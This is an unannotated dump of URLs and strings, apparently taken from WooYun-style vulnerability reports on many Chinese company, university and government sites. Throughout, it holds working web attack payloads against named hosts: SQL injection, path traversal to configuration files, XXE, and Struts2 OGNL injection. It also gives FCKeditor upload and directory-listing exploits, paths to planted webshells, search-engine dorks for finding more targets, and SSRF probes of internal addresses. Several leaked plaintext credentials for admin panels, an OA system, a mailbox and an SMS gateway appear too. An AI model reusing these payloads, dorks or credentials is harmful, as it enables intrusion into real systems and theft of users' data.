https://github.com/zsming1963/old-foundation/blob/3c6d2c71a062fada50ea4bb0d543360e131ff958/donate/payback_.php http://o.appchina.com http://**.**.**.**/sys/loginInput.action 没有关闭和禁用测试帐号 http://topic.ddmap.com/?c=5 http://interface.api.haodai.com/capi/user/updateAvatar http://www.haodai.com/xdyManager.txt) http://**.**.**.**:8081/public/getIndexList.action http://**.**.**.**/cx/index.htm http://**.**.**.**/cx/jsj00.html http://**.**.**.**/cx/qgjsj70/index.htm https://github.com/morvenyang/clican-pluto/blob/d30302456c61da3ba913f06fb9844205ab2f9a1c/peacebird/doc/env.txt http://msg.shouhuobao.com:9090/ http://www.sxhtjs.com.cn/down.asp?id=762 http://bslog.biostime.com.cn/dealerPlatform/ http://yjs.sicnu.edu.cn/ds_search.asp?xsdm=013 http://zjc.sicnu.edu.cn/solicit_2014_sys/solicit_2014_sys_login.aspx http://zjc.sicnu.edu.cn/solicit_2014_sys/solicit2014_infor_enrollment.aspx http://zjc.sicnu.edu.cn/zjc-career-websys-2009/zjc-career/sd_zjc_career_login_stu_info.aspx http://zjc.sicnu.edu.cn/zjc-career-websys-2009/zjc-career/sd_zjc_career_login_stu_filepost.aspx http://**.**.**.**/ http://**.**.**.**/NTRSJ/BasicInfoCmd?appRecId=102881 http://**.**.**.**/NTRSJ/BasicInfoCmd?appRecId=212048 http://**.**.**.**/ http://**.**.**.**/c6/jhsoft.web.workflat/index.aspx# http://124.224.178.205/license!getExpireDateOfDays.action http://huodong.xin.com:8888/ajax/top_load/ data:ename=nanjing http://**.**.**.**/oa/acegi_login_new.jsp http://**.**.**.**/ inurl:hireNetPortal/search_zp_position.do http://**.**.**.**/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/../ http://**.**.**.**:8080/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/../ http://**.**.**.**/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/../ http://t.cn/Ry99OhO http://is.gd/pvv8pu http://www.56688.cc/%E6%B5%B7%E5%8F%A3%E7%BD%91%E4%BA%A4%E6%8E%A5%E6%80%BB%E8%A1%A8.xls http://**.**.**.**/appliance/applClient/ http://career.ruc.edu.cn/article_show2.asp?id=2935 http://100.baihe.com/guest.php?uid=7682&bp=33 https://**.**.**.**:8000/ https://**.**.**.**:8000/common/upload.jsp http://**.**.**.**:9080/vehweb/getsysparaminfo?action=Hd&glbm=420100&xzqh=420104&hpzl=02 http://**.**.**.**:9080/vehweb/navigator http://m.125job.com/hangye/index?funbig=2174 ftp://202.120.46.12/ ftp://202.120.39.248/ ftp://202.120.53.237/ inurl:/OA/HX_LOGIN.ASP http://086.mobi/OA/HX_Login.asp http://**.**.**.**/oa/HX_GetPassWord.asp http://**.**.**.**/sytxmz/question.asp http://**.**.**.**/job_sendpws.aspx?username= http://www.92bjw.com/post.php?catid=154 https://116.228.70.212:8443 http://yiyuan.120ask.com/emarketing/zxyy.html http://app.120.net/,下个快速问医生app http://www.ghzq.com.cn/ubsiServlet\?xml\=%3C%21DOCTYPE%20foo%20%5B%3C%21ENTITY%20%20xxe%20SYSTEM%20%22file%3A%2f%2f%2f%2f%22%3E%5D%3E%3Cubsi%20service%3D%22service%22%20method%3D%22method%22%3E%3Cobject%20type%3D%22Integer%22%3E%26xxe%3B%3C%2fobject%3E%3C%2fubsi%3E%20 http://**.**.**.**/yysjqslsearch,输入手机号后查询受理结果 http://**.**.**.** http://**.**.**.**/jqsl.html http://**.**.**.**/zxfw1.html http://ext.120ask.com/,登陆处参数username存在POST注入,含大量会员和医生信息。 http://www.piccamc.com/ http://www.piccamc.com/news/NewsAttachmentAction.do?method=downloadStaticFile&filename=/../WEB-INF/web.xml inurl:NewShow.asp?byID= http://221.212.156.44/wd/query.php?username=123 http://mboxspace.kuwo.cn/ks/KgeChorusBang?board_id=103 http://mboxspace.kuwo.cn/ks/KgeChorusBang?board_id=103 http://activity.wzdai.com/appShow/pages/index.shtml http://app.wzdai.com/app/user/appCZMM.html http://**.**.**.**/page/user/register.jsp http://a.120ask.com/login?from=aHR0cDovL3d3dy4xMjBhc2suY29tLw== http://huodong.uuu9.com/Runtime/Cache/2011.php http://e.now.cn/auctions/auctions_search_list.net?bargain_bid=1&bargain_buy=1&Domain=1&fprice=1&pagenum=1&search_domain1%5b0%5d=5&search_domain1%5b1%5d=6&search_domain2=1&search_domainSite=1&search_maxLength=200&search_minLength=1&search_show=1&search_style=0&search_undomain=&STRFLAG=0&tprice=1 http://210.51.195.4 http://oa.hrsec.com.cn/login/Login.jsp?logintype=1 http://mail0.hrsec.com.cn/ http://**.**.**.**/admin/login.asp http://106.37.188.186/huoweixin/idnumberquery!first.action http://106.37.188.186/huoweixin/ma.jsp http://wooyun.org/bugs/wooyun-2015-0133830 jdbc:oracle:thin:@**.**.**.**:1521:zqhf http://**.**.**.**/pub/search/search_fj.asp?id=1&mid=28%20and%201=@@version http://**.**.**.**/pub/search/search_fj.asp?id=1&mid=28%20and%201=@@version http://**.**.**.**/pub/search/search_fj.asp?id=1&mid=28%20and%201=@@version http://**.**.**.**/pub/search/search_video.asp?id=862&mid=17%20and%201=@@version http://**.**.**.**/pub/search/search_video.asp?id=862&mid=17%20and%201=@@version http://**.**.**.**/pub/search/search_video.asp?id=862&mid=17%20and%201=@@version http://**.**.**.**/pub/search/search_audio.asp?id=862&mid=17%20and%201=@@version http://**.**.**.**/pub/search/search_audio.asp?id=862&mid=17%20and%201=@@version http://**.**.**.**/pub/search/search_audio.asp?id=862&mid=17%20and%201=@@version http://**.**.**.**/pub/search/search_graph_dl.asp?id=85&mid=4&yh=1 http://**.**.**.**/pub/search/search_graph_view.asp?id=85&mid=4&yh=1 http://**.**.**.**/pub/search/search_fj_view.asp?id=80&mid=4&yh=1 http://**.**.**.**/pub/search/search_fj_dl.asp?id=80&mid=4&yh=1 http://**.**.**.**/pub/search/search_vf.asp?id=7&mid=15 http://**.**.**.**/pub/search/search_fj_dl.asp?id=2&mid=28&yh=1 http://**.**.**.**/pub/search/search_vf.asp?id=7&mid=15 http://**.**.**.**/pub/search/search_graph_view.asp?id=7&mid=15&yh=1 http://**.**.**.**/pub/search/search_graph_dl.asp?id=7&mid=15&yh=1 http://**.**.**.**/pub/search/search_fj_view.asp?id=2&mid=28&yh=1 http://**.**.**.**/pub/search/search_fj_dl.asp?id=19&mid=11&yh=1 http://**.**.**.**/pub/search/search_fj_view.asp?id=19&mid=11&yh=1 http://**.**.**.**/pub/search/search_graph_view.asp?id=102&mid=14&yh=1 http://**.**.**.**/pub/search/search_graph_dl.asp?id=102&mid=14&yh=1 http://**.**.**.**/pub/search/search_vf.asp?id=7&mid=15 http://www.vcanbio.com/company_videodata_detail.aspx?id=1 http://**.**.**.**/find/search.aspx?key=a&type=title http://talents.neusoft.com http://jk.dahe.cn/ http://jk.dahe.cn/robots.txt http://jk.dahe.cn/robots.txt/1.php http://10.**.*.32:8080/kwok http://sms.3etone.com http://www.eoemarket.com/优亿市场注册 http://fuwu.sogou.com/ http://www.lagou.com/ http://**.**.**.**/indexoffice.do http://ts.chexiang.com/ https://pan.chexiang.com http://119.61.4.107:8090/introduce http://**.**.**.**/nxspecial/ admin:admin https://m.pcjinrong.com/footer/get?type=1 https://m.pcjinrong.com/footer/get?type=1 http://wx.pcjinrong.com/footer/get?type=1 http://wx.pcjinrong.com/footer/get?type=1 http://talents.neusoft.com/webdesign/homepage.do http://www.mynj.cn http://58.213.141.215:8080/mynj/conferencePCSIndex1.do http://guahao.qingdaonews.com/YyYisheng/index/keyword/a*.html http://**.**.**.** http://**.**.**.**/xiangmuchaxun.aspx?channel_id=NTg=&endtime=2015-09-28&guapai_time=2011-08-01&&paixu_id=MQ==&parent_id=MA==&xiangmu_name=kndtfxbw http://**.**.**.**/news.php?cate_id=5 http://**.**.**.**/bugs/wooyun-2014-083964 http://**.**.**.**/zjpb http://**.**.**.**/dzztb_pb/login.aspx http://**.**.**.**/ruianpb http://**.**.**.**:85/sqkpb http://**.**.**.**/gxlzpb http://**.**.**.**/lypbnew http://**.**.**.**/siyangpb http://mail.airchinacargo.com/ www.51kudai.com/index.php?user&email=1'%22&q=action/check_email http://rdscm.midea.com.cn:7008/index.jsp http://www.lvmama.com/lvyou/dest_index/ajaxGetWeather https://github.com/frogbink/wap_729/blob/6edfeff4e6afb0321ea5680f34a4ee8000f4c7fd/%E5%90%8E%E5%8F%B0%E8%B4%A6%E5%8F%B7.txt http://**.**.**.** http://**.**.**.**/bak.jspx http://is.gd/WZcXwJ http://club.120ask.com/ http://club.120ask.com/admin.php http://**.**.**.**:80/index.html https://github.com/collonn/MyBatisGen/blob/f4a4c72cc173f9450ba8304bceffc483881c70b0/src/main/resource/config.properties jdbc:oracle:thin:@crh3.rails.cn:5002:crhrdt http://crh3.rails.cn:8008/sw/ https://github.com/gaitian/project/blob/97d02946eab3e3f18aeef6f97702eb9c0295748e/trunk/protected/config/params.php http://**.**.**.**/products.aspx?keywords= http://www.ourteacher.com.cn)主站前台SQL注入可直接明文获取3897个教师用户名、密码(后台登录可查看修改教师身份证号码/手机号/邮箱/工作单位/学历等) http://wap.cfsc.com.cn/phpMyAdmin/ http://**.**.**.**/v6/user/register.html http://**.**.**.**/v6/user/setPwd.html?param=18111111111&r=1443505665447 http://www.now.cn/ipm-admin/cusManager.php?IDIPM=55911 http://www.now.cn/ipm-admin/cusManager.php?IDIPM=55911 http://sqlmap.org http://**.**.**.**/sreach.aspx?keystr=123 https://github.com/chqu21/laravel/blob/b6797eb540cb81c58b21a258b2eddd9d3bc0d6ba/config/sms.php http://61.145.229.29:7791/MWGate/wmgw.asmx/MongateCsSpSendSmsNew?userId=H10308&password=986579&pszMobis=手机号&pszMsg=乌云&iMobiCount=1&pszSubPort=* http://comments.cnmo.com/doc_vote2010.php?document_id= http://**.**.**.**/hwt2/Main/Login http://www.lushanly.com/yewu.php?a_id=4 http://wx.zj.sgcc.com.cn/web/wechat/wechatf/accountManage.do? http://oa.betop-cn.com:8080//yyoa/common/js/menu/test.jsp?doType=101&S1=select http://**.**.**.**/UserCenter/MemberDirectory.aspx?MemberType=104* http://**.**.**.**:8086/gov/newsread.asp?id=254%20and%201=1 http://erm-kbs.ruc.edu.cn/ http://www.ztemt.com/cn http://se-office.ruc.edu.cn/index.php?do=list&channelid=19393 http://se-office.ruc.edu.cn/cn/index.php?do=caseview&caseid=35861 http://se-office.ruc.edu.cn/files.php?fid=1924 http:/xxx http://pub2.whut.edu.cn/icea/civilsite/teacherdetail.asp?classid=42&id=78 http://**.**.**.**:7001/webroot/main/login.jsp http://**.**.**.**:7001/console/login/LoginForm.jsp http://wap.cnht.com.cn/dlarea/dl_pt.php?ptid=28&ptname=symbian&vername=%E9%AB%98%E7%AB%AF%E7%89%88&verid=22 http://**.**.**.**:8089/BookLibrary/BookListImages.aspx?ClassPath=07.13&ClassTypeID=7 http://**.**.**.**:8082/BookLibrary/BookListImages.aspx?ClassPath=07.13&ClassTypeID=7 http://**.**.**.**:8001/BookLibrary/BookListImages.aspx?ClassPath=07.13&ClassTypeID=7 http://**.**.**.**/BookLibrary/BookListImages.aspx?ClassPath=07.13&ClassTypeID=7 http://**.**.**.**:8089/BookLibrary/BookListImages.aspx?ClassPath=07.13&ClassTypeID=7 http://**.**.**.**:8080/sztnet/qryCard.do http://**.**.**.**:8080/mbapp/upload.jsp http://**.**.**.**:8080/mbapp/file.jsp http://**.**.**.**:8080/mbapp/upload/1_1443170412936_0.jsp jdbc:oracle:thin:@**.**.**.**:1521:sztweb jdbc:oracle:thin:@**.**.**.**:1521:orcl http://srm.jinjianghotels.com/JJSRM/Register/Register_Step2.aspx http://jiekou.srm.jinjianghotels.com/JJSRM_upload/Vendor/about20140925215556492.aspx http://jiekou.srm.jinjianghotels.com/JJSRM_upload/Vendor/ASPXxm20120707015654218.aspx http://jiekou.srm.jinjianghotels.com/JJSRM_upload/Vendor/120140925221403009.aspx http://**.**.**.**/hrjs/ http://**.**.**.**/hrjs/downloadresume?&filepath=0001AA100000000232OZ.doc http://**.**.**.**/hrjs/downloadresume?filepath=C%3A%5CWindows%5Csystem.ini http://report.galaxyasset.com/logon.jsp,银河基金投资研究管理系统,此处验证码可重用,用常用用户名和弱口令123456可获得一个有效账号lixia,登陆时会提醒修改密码,这里我将其密码修改成了hello123,登陆后可看到84万多份分析报告,评级有买入、增持等。是不是跟着买就能成为百万富翁,2333~~ http://wap.mmall.com/index.php?r=goods/search http://**.**.**.**/web/jsda/default.aspx http://180.76.129.200:8080/pay/pay.do?redirect=../../WEB-INF/classes/datasource-config.xml%3f http://s.wanxue.cn/pay/pay.do?redirect=../../WEB-INF/classes/datasource-config.xml%3f https://github.com/liduanfeng/SouthMountain/blob/44ed9ff381e4ca1f1a92956f37e410454f73fd90/%E9%A1%BA%E9%A3%8E%E5%B7%A5%E4%BD%9C-%E4%B8%AA%E4%BA%BAPC%E7%99%BB%E5%BD%95%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81%E5%8F%8A%E7%94%B5%E8%84%91%E7%8E%AF%E5%A2%83%E9%85%8D%E7%BD%AE url:http://116.228.53.202:80/manager/html user:admin pass:admin www.sxhtjs.com.cn http://app.b5m.com/?mps=____ http://m.b5m.com/api/ucenter?action=getAddressDetail inurl:cms/cms/infopub http://**.**.**.**/cms/cms/infopub/sendmail.jsp http://**.**.**.**/cms/cms/infopub/sendmail.jsp http://**.**.**.**/cms/cms/infopub/sendmail.jsp http://**.**.**.**/cms/cms/infopub/sendmail.jsp http://**.**.**.**/cms/cms/infopub/sendmail.jsp http://**.**.**.**/cms/cms/infopub/sendmail.jsp http://**.**.**.**/cms/cms/infopub/sendmail.jsp http://**.**.**.**/cms/cmsadmin/wcm/reg/getquestion.jsp http://**.**.**.**/cms/wcm/reg/getquestion.jsp http://**.**.**.**/cms/wcm/reg/getquestion.jsp http://**.**.**.**/cms/wcm/reg/getquestion.jsp http://**.**.**.**/cms/cmsadmin/wcm/reg/getquestion.jsp http://**.**.**.**/cms/wcm/reg/getquestion.jsp http://**.**.**.**/cms/wcm/reg/getquestion.jsp http://**.**.**.**/cms/cmsadmin/wcm/reg/getquestion.jsp http://**.**.**.**/cms/wcm/reg/getquestion.jsp http://**.**.**.**/CHN/Home/HomeList_Search.asp?SearchString=1 http://**.**.**.**/CHN/Home/HomeShow.asp?ContentId=1 http://mail.hisense.com/ http://**.**.**.**/ http://www.zjlh.com.cn/VSSR4/ http://www.zjlianhua.com/talentdata/uddiexplorer/SearchPublicRegistries.jsp http://**.**.**.**/,如图所示: http://**.**.**.**/nanjing/newhos/Sizechart.jsp?count=2&hosId=432E7819-A699-4F1A-B172-975A61629100,如图所示: http://**.**.**.**/nanjing/newhos/Sizechart.jsp http://**.**.**.**/nanjing/newhos/Sizechart.jsp http://**.**.**.**/nanjing/newhos/Sizechart.jsp http://**.**.**.**/nanjing/newhos/Sizechart.jsp http://**.**.**.**/nanjing/newhos/Sizechart.jsp http://**.**.**.**/trade/data/goods.jsp?F04=&F01=&F25=&F26=&F28=&F27= jdbc:oracle:thin:@**.**.**.**:1521:goldts1 http://**.**.**.**/viewNews.do?ctid=5&id=381 http://klyg.njzq.cn//uddiexplorer/SearchPublicRegistries.jsp http://klyg.njzq.cn//uddiexplorer/SetupUDDIExplorer.jsp http://klyg.njzq.cn//uddiexplorer/SearchPublicRegistries.jsp?operator=http://192.168.0.197:22&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search http://klyg.njzq.cn//uddiexplorer/SearchPublicRegistries.jsp?operator=http://192.168.0.197:23&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search http://klyg.njzq.cn//uddiexplorer/SearchPublicRegistries.jsp?operator=http://192.168.0.196:22&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search http://www.yestime.net/scb/scb.php?id=2427 http://58.245.254.229/edms/index.php http://222.161.12.132/edms/index.php# http://alwayson.hp.com.cn/AAS/CsoPartInfo.aspx?no=HPSS901178&id=1 http://www.eventdove.com/ http://isc2015.eventdove.com/ http://2w4fc0yc.eventdove.com/ http://new.citsbj.com:80/ http://zyzj.skymoons.com/mobile/news.php?id=156&pos=hd http://user.ftchinese.com/login http://tts.ttkuaiche.com/carwash/financeController!getUserFinanceAccount.spr url:http://creative.yun.pingan.com/index.php/vote/vote_detail/id/4 http://www.cairenhui.com/case.html http://mail.cairenhui.com http://git.cairenhui.com/users/sign_in http://job.100tal.com/ user:admin http://agency.1jiajie.com/index.php http://**.**.**.**/bugs/wooyun-2010-0119536 http://**.**.**.**/web/mainpage/GZLY/LY_List.aspx?ID=3062 http://**.**.**.**/mainpage/GZLY/LY_List.aspx?ID=3062 http://**.**.**.**/mainpage/GZLY/LY_List.aspx?ID=3062 http://**.**.**.**/mainpage/GZLY/LY_List.aspx?ID=3062 http://**.**.**.**/jnpm/default.aspx?ReturnUrl=%2fjnpm%2fmain.aspx http://alwayson.hp.com.cn/AAS/ASC/reportpartreturn.aspx?strList=HHZC8000731,HHZC8000721,HHZC8000722 http://**.**.**.**/ http://mdv.midea.com/midea/gallery/news-list.action http://dg.2144.cn/whole?cid=1 http://**.**.**.**/bm_tpl/chuli_tpl.php?new_id=a http://ehr.xsdzq.cn/ehr/login.jspa app.laoyuegou.com/tag/join?token=***&user_id=这个参数有注入!这个参数有注入!这个参数有注入!重要的事情说三遍&tag_id=349515&appid=1003&request=1443578689&sign=***&appfrom=104&appver=2.2.3 http://ms.baihe.com/ http://**.**.**.**/system/welcome.do http://210.14.152.122:8888/ http://**.**.** http://**.**.**/ http://kf.2144.cn/query?content=1&type=3 http://**.**.**.**/frontpage/gqhqNotice.jsp?noticeType=lsgg&gqhqId=%27%22 http://xm.2144.cn/whole?cid=1 http://**.**.**.**/yccg/yccg.htm http://**.**.**.**/ http://**.**.**.**/dede/login.php?gotopage=%2Fdede%2Findex.php http://www.crcgas.net/360cp/login.asp http://www.crcgas.net/360cp/manager/adminedit.asp http://www.daai.tv/daai-web/more/project.php?c=986%20and%201%3d2 http://www.daai.tv/daai-web/more/../more/project.php?c=909%20and%201%3d2&fm=icon http://www.sooker.com/index.php?app=netschool&act=clist&cate_id=2998 http://www.niu.com/ http://**.**.**.**/shixibao/e/extend/company.php?id=10504 http://vc.xsdzq.cn/ index.php/house/ajax_set_score/?s=0.44206551369279623 http://bt.loupan.com/ http://www.jobuy.com/ http://www.jobuy.com/getjob.ashx http://**.**.**.**/shixibao/e/extend/result.php?id=7538%200%200%20-%20- https://github.com/yuexueyu/wu06/blob/eb0bccb94e237531fa1c2081c55a358bd1912409/wx/weixinCommonConfig.php http://**.**.**.**/ https://**.**.**.**/wcm/servlet/PrintMc50?aaz257=0000465134 http://i.baidu.com/hello.php http://**.**.**.**:7001/newsedit/e5workspace/Login.jsp http://zzjz2.edong.com/webmall/query.php?page=1&catid=43&typeid=0&myord=id&myshownums=&author=&fromprice=&toprice=&key= http://zzjz2.edong.com/webmall/query.php?key=88952634&imageField=88952634&catid=0&typeid=0&myord=88952634 http://**.**.**.** http://**.**.**.**/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=c:/ http://**.**.**.**/FCKeditor/editor/filemanager/browser/default/browser.html?&Connector=../../connectors/aspx/connector.aspx http://202.116.0.231 http://**.**.**.** http://**.**.**.**/cms/fileupload/uploadwordpic.jsp?AddWebInfoTID=111111&AddWebColumnID=2222&filepath=/app/ http://**.**.**.**/app/jspx.jspx http://**.**.**.**/cms/fileupload/uploadwordpic.jsp?AddWebInfoTID=111111&AddWebColumnID=2222&filepath=/app/ http://**.**.**.**/app/jspx.jspx http://**.**.**.**:8088/nlw/cms/fileupload/uploadwordpic.jsp?AddWebInfoTID=111111&AddWebColumnID=2222&filepath=/app/ shell:http://**.**.**.**:8088/nlw/app/jspx.jspx http://**.**.**.**/cms/fileupload/uploadwordpic.jsp?AddWebInfoTID=111111&AddWebColumnID=2222&filepath=/app/ http://**.**.**.**/app/jspx.jspx http://**.**.**.**/cms/fileupload/uploadwordpic.jsp?AddWebInfoTID=111111&AddWebColumnID=2222&filepath=/app/ http://**.**.**.**/app/jspx.jspx http://**.**.**.**/fsm/cms/fileupload/uploadwordpic.jsp?AddWebInfoTID=111111&AddWebColumnID=2222&filepath=/app/ shell:http://**.**.**.**/fsm/app/jspx.jspx http://mail.hupu.com http://wooyun.org/bugs/wooyun-2015-0126535 http://php.tech.sina.com.cn/elec/search/compare_elec.php?pid=1&tid=54 http://email.jnu.edu.cn/extmail/cgi/index.cgi http://www.telecomhr.com/main/person.php?id=123922 http://**.**.**.** http://**.**.**.**:8088/nlw/cms/video/video_upload.jsp http://**.**.**.**:8088/nlw/cms/video/selectvideo.jsp http://**.**.**.**:8088/nlw/cms-data/flv/20150930165859108290090.jspx http://**.**.**.**/cms/video/selectvideo.jsp http://**.**.**.**/cms-data/2015/09/30/20150930165219479246629.jspx http://**.**.**.**/cms/video/selectvideo.jsp http://**.**.**.**/cms-data/flv/20150930173415057228955.jspx http://**.**.**.**/cms/video/selectvideo.jsp http://**.**.**.**/cms-data/2015/09/30/20150930173042976695275.jspx http://**.**.**.**/fsm/cms/video/selectvideo.jsp http://**.**.**.**/fsm/cms-data/flv/20150930170241727290063.jspx http://lac.jnu.edu.cn/webmanage/index.aspx jdbc:oracle:thin:@**.**.**.**:1521:testdb http://**.**.**.**/index.asp http://**.**.**.**/seach.asp http://**.**.**.** http://**.**.**.**/seach.asp http://**.**.**.** http://**.**.**.**/seach.asp http://**.**.**.** http://**.**.**.**/ajax_check_user.php?email=x http://**.**.**.**/ajax_check_user.php?email=x https://github.com/thaisday/Kili/blob/c3f57f07be8cf7ae4a3a39b8e45f55136cf59ca1/Gibbs/proxy/emailProxy.py http://**.**.**.**/tjcx/64768.htm http://**.**.**.**/xyy2/%28S%28231dwu2ymtkd0445vfjhs355%29%29/tijian/Default.aspx http://**.**.**.** http://**.**.**.**/fsmcms/cms/web/dimensionpic.jsp?action=copy&SrcPicPath=/WEB-INF/web.xml&PicPath=/cms/web/xx.txt http://**.**.**.**/fsmcms/cms/web/dimensionpic.jsp?action=copy&SrcPicPath=/WEB-INF/web.xml&PicPath=/cms/web/xx.txt http://**.**.**.**/fsmcms/cms/web/dimensionpic.jsp?action=copy&SrcPicPath=/WEB-INF/web.xml&PicPath=/cms/web/xx.txt http://**.**.**.**/fsmcms/cms/web/dimensionpic.jsp?action=copy&SrcPicPath=/WEB-INF/web.xml&PicPath=/cms/web/xx.txt http://snsvote.hupu.com/update_vote_new.php?showtype=note&voteid=269955&jsoncallback=jsonp1443605172150&_=1443605185396 http://**.**.**.**/discount.php?brand_id=32 index.php/house/ajax_set_support/?s=0.8241803899873048 http://cf.loupan.com/ FF357B3DDB2593F8F2696C18ED54B674:FG=1 http://oa.ebscn.hk/names.nsf?Login&UserName=gracefu&Password=108061&RedirectTo=/weboa/webpage.nsf http://new.citsbj.com/line/s/chengde?des=desc>ype=1&ord=* http://new.citsbj.com/line/s/nadaihe?des=desc>ype=1&ord=*&page=1&type=1 http://new.citsbj.com/line/s/xila?des=desc&ord=*&page=1&zt=%E4%BA%B2%E5%AD%90 http://new.citsbj.com/visa/search?des=desc&keyword=*&ord=Clicks&type=* http://**.**.**.**/waptwo/**.**.**.**o?businessId=3 http://**.**.**.**/member/register.aspx http://**.**.**.**//registersuccessful.aspx?id=b18c9e79-25bb-430d-82f2-fd950aaca6f4 http://addunit.91huayi.com/secure/login.aspx http://www.fsmcms.com.cn http://sl.huatu.com/package.php?id=1&markStyle=1 http://bm.huatu.com/m/view.php?id=586701 http://exam.huatu.com/index.php?c=zhentgf&a=ztgf&courseid=3&ksgf=1 http://**.**.**.**/weixinpage/sentence.php, jdbc:oracle:thin:@**.**.**.**:1521:ORCL http://wap.cnht.com.cn/manager/welcome.php http://wap.cnht.com.cn http://**.**.**.**:7002/mashouse/common/login.jsp http://**.**.**.**:7002/console/login/LoginForm.jsp http://www.willsonye.com/ http://www.willsonye.com/ShowTutorial.asp?tID=202 http://mail.gdzhongjian.com/wooyun.txt http://subcompany.crgdpharm.com/wooyun.txt http://www.crgdpharm.com/wooyun.txt http://elastic.fun.tv/_status http://elastic.fun.tv/_nodes http://elastic.fun.tv/_search?preety http://**.**.**.**/bugs/wooyun-2015-0131632 http://**.**.**.**/ http://**.**.**.**/bugs/wooyun-2013-032355 www.sxhtjs.com.cn http://**.**.**.**/ http://monitor.fotoplace.cc:8080/script http://mall.vivo.com.cn/.git/config https://recruit.panasonic.cn/portal/recruitment/list.do https://recruit.panasonic.cn/portal/recruitment/list.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://ilife.homelink.com.cn/store/ http://ilife.homelink.com.cn/store.zip http://ilife.homelink.com.cn/aigou/aigou.zip http://admin.dev.skymoons.com/ http://**.**.**.**/bys/dacx.aspx https://github.com/suker413/python/search?utf8=%E2%9C%93&q=mail mail:2081276696@qq.com pass:cninsure2013 https://www.letoudai.com/invest/index/1*/export/1/serial_number/1/money/1 http://**.**.**.**/index.php?m=Article&temp=yhsc&cate_id=13 http://**.**.**.**/index.php?m=Goods&cate_id=2 http://**.**.**.**/index.php?m=Goods&temp=jingpin&cate_id=10 http://**.**.**.**/index.php?m=About&id=23 http://mail.chinadrtv.com/ http://cba.sports.sina.com.cn/rockets_live.php?id=208 http://**.**.**.**/pingajs/login.index http://**.**.**.**/shixibao/cp.php?ac=zhiwei_new&op=get_2&ignore=1&id=1 http://**.**.**.**/shixibao/cp.php?ac=zhiwei_new&op=get_2&ignore=1&id=1 http://**.**.**.**/shixibao/cp.php?ac=zhiwei_new&op=get_2&ignore=1&id=1 https://**.**.**.** http://film.spider.com.cn/tickdating.html?order=hotdating&type=zfLIo4 http://wooyun.org/bugs/wooyun-2010-0114565 http://**.**.**.**/gfms/app/apk/html/ http://**.**.**.**/book/detailBook.jsp?rec_ctrl_id=01h0108500 http://**.**.**.**:8080/book/detailBook.jsp?rec_ctrl_id=01Y0018474 http://**.**.**.**:8080/book/detailBook.jsp?rec_ctrl_id=0100034803 http://**.**.**.**/book/detailBook.jsp?rec_ctrl_id=01h0011897 http://**.**.**.**:8080/opac/book/detailBook.jsp?rec_ctrl_id=01h0050376 http://**.**.**.**/book/detailBook.jsp?rec_ctrl_id=01h0108500 http://**.**.**.**:8080/book/detailBook.jsp?rec_ctrl_id=01Y0018474 http://**.**.**.**:8080/book/detailBook.jsp?rec_ctrl_id=0100034803 http://**.**.**.**/book/detailBook.jsp?rec_ctrl_id=01h0011897 http://**.**.**.**:8080/opac/book/detailBook.jsp?rec_ctrl_id=01h0050376 inurl:detailBook.jsp?rec_ctrl_id= http://**.**.**.**/book/detailBook.jsp?rec_ctrl_id=01h0108500 http://**.**.**.**:8080/book/detailBook.jsp?rec_ctrl_id=01Y0018474 http://**.**.**.**:8080/book/detailBook.jsp?rec_ctrl_id=0100034803 http://**.**.**.**/book/detailBook.jsp?rec_ctrl_id=01h0011897 http://**.**.**.**:8080/opac/book/detailBook.jsp?rec_ctrl_id=01h0050376 http://**.**.**.**/ http://**.**.**.**/www/index.php?mod=index&con=search&act=advanceResult http://**.**.**.**/www/index.php?mod=index&con=search&act=search http://**.**.**.**/www/index.php?mod=index&con=search&act=search http://**.**.**.**/www/index.php?mod=index&con=search&act=Advance http://**.**.**.**/www/index.php?mod=index&con=search&act=Advance http://**.**.**.**/www/index.php?mod=index&con=search&act=search http://focus-login.sohusce.com/auth?index=1 http://team.oschina.net/ http://**.**.**.**/fckeditor/editor/filemanager/browser/default/connectors/test.html http://**.**.**.**/WebSite/FCKFiles/Image/AspxSpy2014Final.aspx http://emarketing.sina.com.cn/case.php?b=49 http://www.cr-leasing.com.cn/ www.cr-leasing.com.cn http://www.cr-leasing.com.cn http://**.**.**.**/webmail/signOn.do http://**.**.**.**/s/1hqEpdKo http://**.**.**.**/s/1i3JCEs1 http://www.haolyy.com/retail/156938?nid=bopu201509300509101777E1AF http://www.haolyy.com/build/image/riskimg/1.jpg http://www.haolyy.com/build/image/riskimg/2.jpg http://www.haolyy.com/build/image/riskimg/3.jpg http://www.haolyy.com/build/image/riskimg/4.jpg http://www.haolyy.com/build/image/riskimg/5.jpg http://zxy.iy6.cn/?action=detail&id=85 http://jjsg.iy6.cn/?action=detail&id=4825 http://xyfm.iy6.cn/?action=detail&id=2935 http://wj.iy6.cn/?action=detail&id=3581 http://rxhzw.iy6.cn/?action=detail&id=26 http://wj2.iy6.cn/?action=detail&id=3226 http://smsg.iy6.cn/?action=detail&id=2946 http://xyfm.iy6.cn/?action=detail&id=2935 http://zxy.iy6.cn/?action=detail&id=85 http://zxy.iy6.cn/?action=detail&id=85 http://azyfy.51yuyi.com/如图所示: http://azyfy.51yuyi.com/doctor_introduction.jsp?hosid=42&hospitalid=42&docid=1069,如图所示: http://azyfy.51yuyi.com/doctor_introduction.jsp?hosid=42&hospitalid=42&docid=1069"如图所示: 